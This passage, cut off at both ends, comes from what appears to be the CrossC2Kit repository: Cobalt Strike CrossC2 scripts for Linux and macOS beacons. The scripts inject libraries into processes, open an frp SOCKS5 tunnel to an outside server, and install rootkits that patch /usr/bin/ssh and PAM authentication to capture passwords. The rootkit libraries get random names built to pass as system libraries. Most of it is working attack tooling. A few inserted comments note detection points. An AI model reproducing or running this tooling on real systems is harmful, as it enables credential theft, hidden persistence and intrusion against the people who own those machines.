135 | } 136 | } 137 | 138 | sub openInjectDialog { 139 | local('$bid $dialog'); 140 | $bid = $1; 141 | local('%beaconListenerMap @beaconListenerMenu'); 142 | %beaconListenerMap = getCrossC2Listener(); 143 | @beaconListenerMenu = @(); 144 | foreach 
$key => $value (%beaconListenerMap) { 145 | add(@beaconListenerMenu, $value[0]); 146 | } 147 | add(@beaconListenerMenu,"null"); 148 | $dialog = dialog("ProcessInject", %(bid => $bid[0], injectPID => "", workspace => "/tmp/", lib_file => $null, listener => $null), &openInjectDialogCallBack); 149 | dialog_description($dialog, "Inject dynamic library file or CrossC2 listener"); 150 | 151 | drow_text($dialog, "injectPID", "inject PID: ", 20); 152 | drow_text($dialog, "workspace", "workspace: ", 20); 153 | drow_file($dialog, "lib_file", "Choose: dynamic library file"); 154 | drow_combobox($dialog, "listener", "CrossC2 Listener: ", @beaconListenerMenu); 155 | dbutton_action($dialog, "run"); 156 | dialog_show($dialog); 157 | } 158 | 159 | sub cc2_inject_status { 160 | local('$bid $os $arch $system'); 161 | $bid = $1; 162 | $os = lc(beacon_info($bid, "os")); 163 | $arch = beacon_info($bid, "arch"); 164 | if ('linux' isin $os) { 165 | if ($arch eq 'x64') { 166 | return 'Linux64'; 167 | } 168 | } 169 | return ''; 170 | } -------------------------------------------------------------------------------- /proxy/frp/cc2_frp.cna: -------------------------------------------------------------------------------- 1 | 2 | # include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_frp { 5 | blog($1, "\nCrossC2 proxy frp - Start SOCKS5 {TCP/KCP(UDP)}\nby: daybr4ak\nUsage: cc2_frp \n\n\tsip: \tfrp server ip\n\tsport: \tfrp server port\n\ttoken: \tfrp token\n\tprotocol: \ttcp / kcp\n\tuser: \tsocks5 username\n\tpass: \tsocks5 password\n\trport: \tsocks5 port\nEx:\n\tcc2_frp linux 112.12.11.12:8000 token1234 tcp admin:passwd:8001"); 6 | } 7 | 8 | sub cc2_frp { 9 | local('$taskName $taskType $taskResType'); 10 | local('$bid $arch $server_host $token $protocol $bindInfo $transportArg'); 11 | local('$loadlib $t_host $t_user $t_pwd $t_port'); 12 | $taskName = "cc2_frp"; # taskName 13 | $taskType = "so"; # $taskType -> ELF, MachO, so, dylib 14 | $taskResType = "info"; # info -> normal 
message 15 | 16 | $bid = $1; 17 | $arch = $2; 18 | $server_host = $3; 19 | $token = $4; 20 | $protocol = $5; 21 | $bindInfo = $6; 22 | $transportArg = $server_host . "^" . $token . "^" . $protocol . "^" . $bindInfo; 23 | 24 | if ($arch eq "osx") { 25 | $loadlib = "proxy/frp/crossc2_frp.dylib"; 26 | } else if ($arch eq "linux32") { 27 | $loadlib = "proxy/frp/crossc2_frp32.so"; 28 | } else if ($arch eq "linux") { 29 | $loadlib = "proxy/frp/crossc2_frp.so"; 30 | } else { 31 | berror($bid, "*[error]: system"); 32 | printUsage_frp($bid); 33 | return; 34 | } 35 | if ($server_host && $token && $protocol && $bindInfo) { 36 | ($t_host, $_) = split(":", $server_host); 37 | ($t_user, $t_pwd, $t_port) = split(":", $bindInfo); 38 | blog($bid, "s5(server\[$protocol\]) $t_host\:$t_port $t_user\:$t_pwd"); 39 | bcrossc2_load_dyn($bid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 40 | } else { 41 | printUsage_frp($bid); 42 | } 43 | 44 | } 45 | 46 | ssh_alias("cc2_frp", &cc2_frp); 47 | 48 | ssh_command_register("cc2_frp", "CrossC2 proxy frp - Start Linux/MacOS SOCKS5 proxy {TCP/KCP(UDP)}", "\nby: daybr4ak\nUsage: cc2_frp \n\n\tsip: \tfrp server ip\n\tsport: \tfrp server port\n\ttoken: \tfrp token\n\tprotocol: \ttcp / kcp\n\tuser: \tsocks5 username\n\tpass: \tsocks5 password\n\trport: \tsocks5 port\nEx:\n\tcc2_frp linux 112.12.11.12:8000 token1234 tcp admin:passwd:8001"); 49 | 50 | 51 | sub openProxyDialogCallBack { 52 | local('$bid $f_server_lh $f_server_lp $f_token $protocol $s5_username $s5_password $s5_port'); 53 | local('$os $arch $system'); 54 | $bid = $3['bid']; 55 | $f_server_lh = $3['f_server_lh']; 56 | $f_server_lp = $3['f_server_lp']; 57 | $f_token = $3['f_token']; 58 | $protocol = $3['protocol']; 59 | $s5_username = $3['s5_username']; 60 | $s5_password = $3['s5_password']; 61 | $s5_port = $3['s5_port']; 62 | 63 | $os = lc(beacon_info($bid, "os")); 64 | $arch = beacon_info($bid, "arch"); 65 | $system = ""; 66 | if ('linux' isin $os) { 67 | if ($arch eq 
'x86') { 68 | $system = "linux32"; 69 | } else if ($arch eq 'x64') { 70 | $system = "linux"; 71 | } 72 | } else if ('macos' isin $os) { 73 | $system = "osx"; 74 | } 75 | binput($bid, "cc2_frp $system $f_server_lh\:$f_server_lp $f_token $protocol $s5_username\:$s5_password\:$s5_port"); 76 | blog($bid, "proxy (server\[$protocol\], client\[$system\]) \: $f_server_lh\:$s5_port $s5_username / $s5_password"); 77 | cc2_frp($bid, $system, $f_server_lh.':'.$f_server_lp, $f_token, $protocol, $s5_username.':'.$s5_password.':'.$s5_port); 78 | } 79 | 80 | sub openProxyDialog { 81 | local('$bid $dialog'); 82 | $bid = $1; 83 | $dialog = dialog("proxy s5", %(bid => $bid[0], f_server_lh => "x.x.x.x", f_server_lp => "4444", f_token => "frp-server-token", protocol => "tcp", s5_username => "admin", s5_password => "password", s5_port => "8080"), &openProxyDialogCallBack); 84 | dialog_description($dialog, "setup frp proxy"); 85 | 86 | drow_text($dialog, "f_server_lh", "frp listening host: ", 20); 87 | drow_text($dialog, "f_server_lp", "frp listening port: ", 20); 88 | drow_text($dialog, "f_token", "frp listening token: ", 20); 89 | drow_combobox($dialog, "protocol", "Type: ", @("tcp", "udp")); 90 | drow_text($dialog, "s5_username", "socks5 username: "); 91 | drow_text($dialog, "s5_password", "socks5 password: "); 92 | drow_text($dialog, "s5_port", "socks5 port: "); 93 | 94 | dbutton_action($dialog, "run"); 95 | dialog_show($dialog); 96 | } 97 | 98 | 99 | sub cc2_frp_status { 100 | local('$bid $os $arch $system'); 101 | $bid = $1; 102 | $os = lc(beacon_info($bid, "os")); 103 | $arch = beacon_info($bid, "arch"); 104 | if ('linux' isin $os) { 105 | if ($arch eq 'x86') { 106 | return ''; 107 | } else if ($arch eq 'x64') { 108 | return 'Linux64'; 109 | } 110 | } else if ('macos' isin $os) { 111 | return 'MacOS(intel)'; 112 | } 113 | return ''; 114 | } -------------------------------------------------------------------------------- /proxy/frp/crossc2_frp.dylib: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/proxy/frp/crossc2_frp.dylib -------------------------------------------------------------------------------- /proxy/frp/crossc2_frp.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/proxy/frp/crossc2_frp.so -------------------------------------------------------------------------------- /rootkit/auth/auth_rootkit_mgr.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/auth_rootkit_mgr.so -------------------------------------------------------------------------------- /rootkit/auth/auth_rootkit_mgr32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/auth_rootkit_mgr32.so -------------------------------------------------------------------------------- /rootkit/auth/auth_rootkit_module.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/auth_rootkit_module.so -------------------------------------------------------------------------------- /rootkit/auth/auth_rootkit_module32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/auth_rootkit_module32.so -------------------------------------------------------------------------------- /rootkit/auth/auth_rootkit_remove.so: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/auth_rootkit_remove.so -------------------------------------------------------------------------------- /rootkit/auth/auth_rootkit_remove32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/auth_rootkit_remove32.so -------------------------------------------------------------------------------- /rootkit/auth/cc2_auth.cna: -------------------------------------------------------------------------------- 1 | 2 | # include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_auth { 5 | blog($1, "\nUsage: cc2_auth (lib_name)\n\troot permissions\nssh rootkit: Get password for auth action(sshd/sudo/su/passwd...).\n\tstep: \t, , .\n\n\tstep 1. install: \tget a prepared dynamic library file `libxxx.0.0.1.so`.\n\tstep 2. run: \tstart running ssh rootkit.\n\tstep 3. 
uninstall: \tuninstall ssh rootkit.\nEx:\n\tcc2_auth linux install\n\tcc2_auth linux run\n\tcc2_auth linux uninstall libxxx.0.0.1.so\n"); 6 | } 7 | 8 | sub cc2_auth { 9 | $taskName = "cc2_auth"; # taskName 10 | $taskType = "so"; # $taskType -> ELF, MachO, so, dylib 11 | $taskResType = "keystrokes"; # keystrokes -> keylogger message 12 | 13 | $beaconid = $1; 14 | $arch = $2; 15 | $chose = $3; 16 | $realPatchName = $4; 17 | $transportArg = "blankArg"; 18 | 19 | $patchlib = "rootkit/auth/auth_rootkit_module"; 20 | $loadlib = "rootkit/auth/auth_rootkit_mgr"; 21 | $removelib = "rootkit/auth/auth_rootkit_remove"; 22 | 23 | $os = lc(beacon_info($beaconid, "os")); 24 | $arch = beacon_info($beaconid, "arch"); 25 | 26 | if ('linux' isin $os) { 27 | if ($arch eq 'x64') { 28 | $patchlib = $patchlib.".so"; 29 | $loadlib = $loadlib.".so"; 30 | $removelib = $removelib.".so"; 31 | } else if ($arch eq 'x86') { 32 | $patchlib = $patchlib."32.so"; 33 | $loadlib = $loadlib."32.so"; 34 | $removelib = $removelib."32.so"; 35 | } 36 | } else if ('macos' isin $os) { 37 | $patchlib = $patchlib.".dylib"; 38 | $loadlib = $loadlib.".dylib"; 39 | $removelib = $removelib.".dylib"; 40 | } else { 41 | berror($beaconid, "*[error]: Only Linux/MacOS is supported for now."); 42 | printUsage_auth($beaconid); 43 | return; 44 | } 45 | $patchName = "libk5ccrypto1.0.4.so"; 46 | 47 | if ($chose eq "install") { 48 | $installPath = $4; 49 | $authPath = $5; 50 | blog($beaconid, "patch auth:"); 51 | $patchHead = @("pcre", "se", "kbr5", "k5c"); 52 | $patchBody = @("dl", "crypto", "resolv", "z"); 53 | $patchVer = @("1.0.1", "1.2.1.2", "1.0.1.3"); 54 | $patchEnd = ".so"; 55 | $patchName = "lib".$patchHead[rand(4)].$patchBody[rand(4)].$patchVer[rand(3)].$patchEnd; 56 | blog($beaconid, "patch name: ".$patchName); 57 | $patchArg = $patchName."^"; 58 | if ($installPath && $authPath) { 59 | $patchArg = $patchArg.$installPath."^".$authPath; 60 | } 61 | 62 | bcrossc2_load_dyn($beaconid, "so", "cc2_auth_module", "info", 
$patchlib, $patchArg) 63 | } else if ($chose eq "run") { 64 | blog($beaconid, "get password for ssh login:"); 65 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 66 | } else if ($chose eq "uninstall") { 67 | $installPath = $4; 68 | bcrossc2_load_dyn($beaconid, "so", "cc2_remove_auth", "info", $removelib, $installPath."^"); 69 | } else { 70 | berror($beaconid, "*[error]: step type"); 71 | printUsage_auth($beaconid); 72 | } 73 | } 74 | 75 | ssh_alias("cc2_auth", &cc2_auth); 76 | 77 | ssh_command_register("cc2_auth", "CrossC2 auth rootkit - Get password for auth action(sshd/sudo/su/passwd...).", "\nUsage: cc2_auth (lib_name)\n\troot permissions\nssh rootkit: Get password for auth action(sshd/sudo/su/passwd...).\n\tstep: \t, , .\n\n\tstep 1. install: \tget a prepared dynamic library file `libxxx.0.0.1.so`.\n\tstep 2. run: \tstart running ssh rootkit.\n\tstep 3. uninstall: \tuninstall ssh rootkit.\nEx:\n\tcc2_auth linux install\n\tcc2_auth linux run\n\tcc2_auth linux uninstall libxxx.0.0.1.so\n"); 78 | 79 | 80 | sub openAuthKitDialogCallBack { 81 | $patchRandName = $3['patchRandName']; 82 | $patchName = $3['patchName']; 83 | 84 | if (($patchName eq $null) && ($patchRandName eq $null)) { 85 | berror($bid, "error with patchName or patchRandName"); 86 | } else { 87 | $patch_name = ""; 88 | if ($patchName ne "") { 89 | $patch_name = $patchName; 90 | } else { 91 | $patch_name = $patchRandName; 92 | } 93 | $os = lc(beacon_info($bid, "os")); 94 | $arch = beacon_info($bid, "arch"); 95 | 96 | blog($bid, "cc2_auth install"); 97 | cc2_auth($bid, "", "install"); 98 | blog($bid, "cc2_auth run"); 99 | cc2_auth($bid, "", "run"); 100 | } 101 | } 102 | 103 | sub openAuthKitDialog { 104 | $bid = $1; 105 | $dialog = dialog("PAM auth log", %(bid => $bid, patchRandName => "libk5ccrypto1.0.4.so", patchName => ""), &openAuthKitDialogCallBack); 106 | dialog_description($dialog, "pam auth log"); 107 | 108 | $patchName = "libk5ccrypto1.0.4.so"; 109 | 
# --- tail of openAuthKitDialog: its header is outside this view, left exactly as found ---
$patchHead = @("pcre", "se", "kbr5", "k5c");
$patchBody = @("dl", "crypto", "resolv", "z");
$patchVer = @("1.0.1", "1.2.1.2", "1.0.1.3");
$patchEnd = ".so";

@patchNameArray = @();
for ($x = 0; $x < 5; $x++) {
push(@patchNameArray, "lib".$patchHead[rand(4)].$patchBody[rand(4)].$patchVer[rand(3)].$patchEnd);
}

drow_text($dialog, "patchName", "patchName: ");
drow_combobox($dialog, "patchRandName", "patchRandName: ", @patchNameArray);

dbutton_action($dialog, "run");
dialog_show($dialog);
}

# Dialog callback for the PAM-kit uninstall dialog: reads the patchName field
# and tasks the "uninstall" step of cc2_auth (defined earlier in this file).
# Only $patchName is local(); $bid is the script-global left behind by
# openAuthKitUninstallDialog, which is how the callback knows the beacon.
sub openAuthKitUninstallDialogCallBack {
    local('$patchName');
    $patchName = $3['patchName'];

    blog($bid, "cc2_auth uninstall ".$patchName);
    cc2_auth($bid, "", "uninstall", $patchName);
}

# Builds and shows the "PAM auth log uninstall" dialog for beacon $1.
# Assigns the global $bid that the callback above relies on.
sub openAuthKitUninstallDialog {
    $bid = $1;
    $dialog = dialog("PAM auth log uninstall", %(bid => $bid, patchName => ""), &openAuthKitUninstallDialogCallBack);
    dialog_description($dialog, "pam auth log uninstall");

    drow_text($dialog, "patchName", "patchName: ");

    dbutton_action($dialog, "uninstall");
    dialog_show($dialog);
}


# Platform label for the kit's status column, derived from beacon_info():
# 'Linux64', 'Linux32', 'MacOS(intel)', or '' when the beacon is neither.
# $system is declared local() but never used.
sub cc2_auth_status {
    local('$bid $os $arch $system');
    $bid = $1;
    $os = lc(beacon_info($bid, "os"));
    $arch = beacon_info($bid, "arch");
    if ('linux' isin $os) {
        if ($arch eq 'x64') {
            return 'Linux64';
        } else if ($arch eq 'x86') {
            return 'Linux32';
        }
    } else if ('macos' isin $os) {
        return 'MacOS(intel)';
    }
    return '';
}
-------------------------------------------------------------------------------- /rootkit/auth/cc2_ssh.cna: --------------------------------------------------------------------------------

# include(script_resource("CrossC2Kit.cna"));

# Writes the cc2_ssh usage text to the console of beacon $1.
# (The original usage text lost its <arch>/<step> placeholders to markup
# stripping; the "(lib_name)" and ", , , , ." fragments are what remains.)
sub printUsage_ssh {
    blog($1, "\nUsage: cc2_ssh (lib_name)\n\troot permissions\nssh rootkit: Get the password of ssh to log in to other targets.\n\tstep: \t, , , , .\n\n\tstep 1. install: \tget a prepared dynamic library file `libxxx.0.0.1.so`.\n\tstep 2. patch: \tspecify the name of the dynamic library to patch.\n\tstep 3. run: \tstart running ssh rootkit.\n\tstep 4. uninstall: \tuninstall ssh rootkit.\n\tstep 5. clean: \tclean ssh rootkit.\nEx:\n\tcc2_ssh linux install\n\tcc2_ssh linux patch libxxx.0.0.1.so\n\tcc2_ssh linux run\n\tcc2_ssh linux uninstall libxxx.0.0.1.so\n\tcc2_ssh linux clean libxxx.0.0.1.so\n");
}

# cc2_ssh: runs one step of the ssh-rootkit workflow on a beacon.
#   $1  beacon id
#   $2  platform: "linux32" | "linux" | "osx" (anything else -> error + usage)
#   $3  step:     "install" | "patch" | "run" | "uninstall" | "clean"
#   $4  library name produced by the install step; used by every other step
# Nothing here is declared local(), so every variable below is script-global
# and shared with (and overwritten by) the other subs in this file.
# Host-side effects visible in this sub, useful when looking for this kit:
#   - "patch" hands the bundled patchelf `--add-needed <name> /usr/bin/ssh`,
#     i.e. it rewrites the NEEDED list of the ssh client binary itself;
#   - "clean" runs `rm -f /usr/lib/<name>`, so that is where the module is
#     expected to reside after install;
#   - "run" loads the *_mgr library and tags its results as "keystrokes".
# A package/file-integrity check of /usr/bin/ssh, and an inventory of /usr/lib
# for libraries whose names match the generator below, are the direct detections.
sub cc2_ssh {
    $taskName = "cc2_ssh"; # taskName
    $taskType = "so"; # $taskType -> ELF, MachO, so, dylib
    $taskResType = "keystrokes"; # keystrokes -> keylogger message

    $beaconid = $1;
    $arch = $2;
    $chose = $3;
    $realPatchName = $4;
    $transportArg = "blankArg";

    # Per-platform artifact selection: the module that gets installed, the
    # patcher used to hook it into ssh, and the manager loaded by "run".
    if ($arch eq "linux32") {
        $patchlib = "rootkit/auth/ssh_rootkit_module32.so";
        $patch = "patch/libpatchelf32.so";
        $loadlib = "rootkit/auth/ssh_rootkit_mgr32.so";
        $patchType = "so";
    } else if ($arch eq "linux") {
        $patchlib = "rootkit/auth/ssh_rootkit_module.so";
        $patch = "patch/libpatchelf.so";
        $loadlib = "rootkit/auth/ssh_rootkit_mgr.so";
        $patchType = "so";
    } else if ($arch eq "osx") {
        $patchlib = "rootkit/auth/ssh_rootkit.dylib";
        $patch = "install_name_tool";
        $loadlib = "rootkit/auth/ssh_rootkit_mgr.dylib";
        $patchType = "MachO";
    } else {
        berror($beaconid, "*[error]: Only Linux/MacOS is supported for now.");
        printUsage_ssh($beaconid);
        return;
    }
    # Default name; overwritten by "install" (random) or by $4 (all other steps).
    $patchName = "libk5ccrypto1.0.4.so";

    if ($chose eq "install") {
        blog($beaconid, "patch ssh:");
        # The name is assembled to look like a system library:
        # "lib" + head + body + version + suffix, each drawn at random.
        $patchHead = @("pcre", "se", "kbr5", "k5c");
        $patchBody = @("dl", "crypto", "resolv", "z");
        $patchVer = @("1.0.4", "1.5.1.2", "1.2.1.3");
        if ($patchType eq "so") {
            $patchEnd = ".so";
        } else {
            $patchEnd = ".dylib";
        }
        $patchName = "lib".$patchHead[rand(4)].$patchBody[rand(4)].$patchVer[rand(3)].$patchEnd;
        blog($beaconid, "patch name: ".$patchName);

        # Module is loaded as "so" regardless of $patchType; the chosen name
        # (with "^" terminator) is the only argument it receives.
        bcrossc2_load_dyn($beaconid, "so", "cc2_ssh_module", "info", $patchlib, $patchName."^")
    } else {
        $patchName = $realPatchName;
        if ($chose eq "patch") {
            if ($patchType eq "so") {
                $patchArg = "--add-needed^".$patchName."^/usr/bin/ssh";
                bcrossc2_load_dyn($beaconid, "so", "cc2_patch", "info", $patch, $patchArg);
            } else if ($patch eq "MachO") {
                # NOTE(review): $patch holds a tool path here, so this comparison is
                # never true and the macOS branch is dead code as written.
                $patchArg = "-add_rpath^".$patchName;
                bcrossc2_load_dyn($beaconid, "MachO", "cc2_patch", "info", $patch, $patchArg);
            }
        } else if ($chose eq "run") {
            blog($beaconid, "get password for ssh login:");
            bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg);
        } else if ($chose eq "uninstall") {
            if ($patchType eq "so") {
                $patchArg = "--remove-needed^".$patchName."^/usr/bin/ssh";
                bcrossc2_load_dyn($beaconid, "so", "cc2_patch", "info", $patch, $patchArg);
            } else if ($patch eq "MachO") {
                # NOTE(review): same dead comparison as in the "patch" step above.
                $patchArg = "-delete_rpath^".$patchName;
                bcrossc2_load_dyn($beaconid, "MachO", "cc2_patch", "info", $patch, $patchArg);
            }
        } else if ($chose eq "clean") {
            # Plain shell command on the beacon host; the library name is
            # interpolated unquoted.
            bshell($beaconid, "rm -f /usr/lib/".$patchName);
        } else {
            berror($beaconid, "*[error]: step type");
            printUsage_ssh($beaconid);
        }
    }
}

ssh_alias("cc2_ssh", &cc2_ssh);

ssh_command_register("cc2_ssh", "CrossC2 SSH rootkit - Get the password of ssh to log in to other targets.", "\nUsage: cc2_ssh (lib_name)\n\troot permissions\nssh rootkit: Get password for ssh login.\n\tstep: \t, , , , .\n\n\tstep 1. install: \tget a prepared dynamic library file `libxxx.0.0.1.so`.\n\tstep 2. patch: \tspecify the name of the dynamic library to patch.\n\tstep 3. run: \tstart running ssh rootkit.\n\tstep 4. uninstall: \tuninstall ssh rootkit.\n\tstep 5. clean: \tclean ssh rootkit.\nEx:\n\tcc2_ssh linux install\n\tcc2_ssh linux patch libxxx.0.0.1.so\n\tcc2_ssh linux run\n\tcc2_ssh linux uninstall libxxx.0.0.1.so\n\tcc2_ssh linux clean libxxx.0.0.1.so\n");

# Callback for the dialog built by openSSHKitDialog.  $bid is the global set
# by that sub.  Picks the typed name over the combobox name into $patch_name,
# but $patch_name, $os and $arch are then never used: both calls go to
# cc2_auth (cc2_auth.cna) with an empty arch and no name, not to cc2_ssh, so
# this is effectively a copy of the PAM-kit dialog callback.
sub openSSHKitDialogCallBack {
    $patchRandName = $3['patchRandName'];
    $patchName = $3['patchName'];

    if (($patchName eq $null) && ($patchRandName eq $null)) {
        berror($bid, "error with patchName or patchRandName");
    } else {
        $patch_name = "";
        if ($patchName ne "") {
            $patch_name = $patchName;
        } else {
            $patch_name = $patchRandName;
        }
        $os = lc(beacon_info($bid, "os"));
        $arch = beacon_info($bid, "arch");

        blog($bid, "cc2_auth install");
        cc2_auth($bid, "", "install");
        blog($bid, "cc2_auth run");
        cc2_auth($bid, "", "run");
    }
}

# Builds the dialog for beacon $1: a free-text name field plus a combobox of
# five generated names (same generator as cc2_ssh's install step, but with the
# version list from cc2_auth.cna and always a ".so" suffix).  Title and
# description still say "PAM auth log".  Sets the global $bid for the callback.
sub openSSHKitDialog {
    $bid = $1;
    $dialog = dialog("PAM auth log", %(bid => $bid, patchRandName => "libk5ccrypto1.0.4.so", patchName => ""), &openSSHKitDialogCallBack);
    dialog_description($dialog, "pam auth log");

    $patchName = "libk5ccrypto1.0.4.so";

    $patchHead = @("pcre", "se", "kbr5", "k5c");
    $patchBody = @("dl", "crypto", "resolv", "z");
    $patchVer = @("1.0.1", "1.2.1.2", "1.0.1.3");
    $patchEnd = ".so";

    @patchNameArray = @();
    for ($x = 0; $x < 5; $x++) {
        push(@patchNameArray, "lib".$patchHead[rand(4)].$patchBody[rand(4)].$patchVer[rand(3)].$patchEnd);
    }

    drow_text($dialog, "patchName", "patchName: ");
    drow_combobox($dialog, "patchRandName", "patchRandName: ", @patchNameArray);

    dbutton_action($dialog, "run");
    dialog_show($dialog);
}

# Uninstall-dialog callback; like the install callback it tasks cc2_auth
# rather than cc2_ssh, and reads the global $bid.
sub openSSHKitUninstallDialogCallBack {
    $patchName = $3['patchName'];

    cc2_auth($bid, "", "uninstall", $patchName);
}

# Shows the uninstall dialog for beacon $1 (one text field: patchName).
sub openSSHKitUninstallDialog {
    $bid = $1;
    $dialog = dialog("PAM auth log uninstall", %(bid => $bid, patchName => ""), &openSSHKitUninstallDialogCallBack);
    dialog_description($dialog, "pam auth log uninstall");

    drow_text($dialog, "patchName", "patchName: ");

    dbutton_action($dialog, "uninstall");
    dialog_show($dialog);
}


# Platform label for the status column; byte-for-byte the same logic as
# cc2_auth_status in cc2_auth.cna ('Linux64' | 'Linux32' | 'MacOS(intel)' | '').
sub cc2_ssh_status {
    local('$bid $os $arch $system');
    $bid = $1;
    $os = lc(beacon_info($bid, "os"));
    $arch = beacon_info($bid, "arch");
    if ('linux' isin $os) {
        if ($arch eq 'x64') {
            return 'Linux64';
        } else if ($arch eq 'x86') {
            return 'Linux32';
        }
    } else if ('macos' isin $os) {
        return 'MacOS(intel)';
    }
    return '';
}
-------------------------------------------------------------------------------- /rootkit/auth/ssh_rootkit.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/ssh_rootkit.dylib -------------------------------------------------------------------------------- /rootkit/auth/ssh_rootkit_mgr.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/ssh_rootkit_mgr.dylib -------------------------------------------------------------------------------- /rootkit/auth/ssh_rootkit_mgr.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/ssh_rootkit_mgr.so -------------------------------------------------------------------------------- /rootkit/auth/ssh_rootkit_mgr32.so: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/ssh_rootkit_mgr32.so -------------------------------------------------------------------------------- /rootkit/auth/ssh_rootkit_module.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/ssh_rootkit_module.so -------------------------------------------------------------------------------- /rootkit/auth/ssh_rootkit_module32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/rootkit/auth/ssh_rootkit_module32.so -------------------------------------------------------------------------------- /scanner/ServerScan/linux/ELF/portscan: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/scanner/ServerScan/linux/ELF/portscan -------------------------------------------------------------------------------- /scanner/ServerScan/linux/ELF/portscan386: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/scanner/ServerScan/linux/ELF/portscan386 -------------------------------------------------------------------------------- /scanner/ServerScan/linux/ELF/serverscan: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/scanner/ServerScan/linux/ELF/serverscan -------------------------------------------------------------------------------- /scanner/ServerScan/linux/ELF/serverscan386: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/scanner/ServerScan/linux/ELF/serverscan386 -------------------------------------------------------------------------------- /scanner/ServerScan/linux/SO/crossc2_portscan.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/scanner/ServerScan/linux/SO/crossc2_portscan.so -------------------------------------------------------------------------------- /scanner/ServerScan/linux/SO/crossc2_serverscan.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/scanner/ServerScan/linux/SO/crossc2_serverscan.so -------------------------------------------------------------------------------- /scanner/ServerScan/serverscan.cna: --------------------------------------------------------------------------------
# include(script_resource("CrossC2Kit.cna"));

# Usage printers: one per alias below, each writes its help text to beacon $1.
# (The "<arch> <host> <port> <scan_type>" placeholders were lost to markup
# stripping, which is why "Usage: cc2_xxx " ends abruptly.)
sub printUsage_portscan_dyn {
    blog($1, "cc2_portscan_dyn\nby: trim\nUsage: cc2_portscan_dyn \n\n\thost:\t192.168.1.1\n\t\t\t192.168.1.1-10\n\t\t\t192.168.1.*\n\t\t\t192.168.1.0/24\n\tport:\t21,22,80-99,8000-8080 ...\n\tscan_type: icmp / tcp\nEx:\n\tcc2_portscan linux 10.20.10.1/24 22,445,80-99,8000-8080 tcp");
}

sub printUsage_ServerScan_dyn {
    blog($1, "cc2_serverscan_dyn\nby: trim\nUsage: cc2_serverscan_dyn \n\n\thost:\t192.168.1.1\n\t\t\t192.168.1.1-10\n\t\t\t192.168.1.*\n\t\t\t192.168.1.0/24\n\tport:\t21,22,80-99,8000-8080 ...\n\tscan_type: icmp / tcp\nEx:\n\tcc2_serverscan linux 10.20.10.1/24 22,445,80-99,8000-8080 tcp");
}

sub printUsage_portscan {
    blog($1, "cc2_portscan\nby: trim\nUsage: cc2_portscan \n\n\thost:\t192.168.1.1\n\t\t\t192.168.1.1-10\n\t\t\t192.168.1.*\n\t\t\t192.168.1.0/24\n\tport:\t21,22,80-99,8000-8080 ...\n\tscan_type: icmp / tcp\nEx:\n\tcc2_portscan linux 10.20.10.1/24 22,445,80-99,8000-8080 tcp");
}

sub printUsage_ServerScan {
    blog($1, "cc2_serverscan\nby: trim\nUsage: cc2_serverscan \n\n\thost:\t192.168.1.1\n\t\t\t192.168.1.1-10\n\t\t\t192.168.1.*\n\t\t\t192.168.1.0/24\n\tport:\t21,22,80-99,8000-8080 ...\n\tscan_type: icmp / tcp\nEx:\n\tcc2_serverscan linux 10.20.10.1/24 22,445,80-99,8000-8080 tcp");
}

# cc2_portscan_dyn: in-memory ("so") port scanner.
#   $1 beacon id, $2 platform ("osx"|"linux32"|"linux"), $3 host spec,
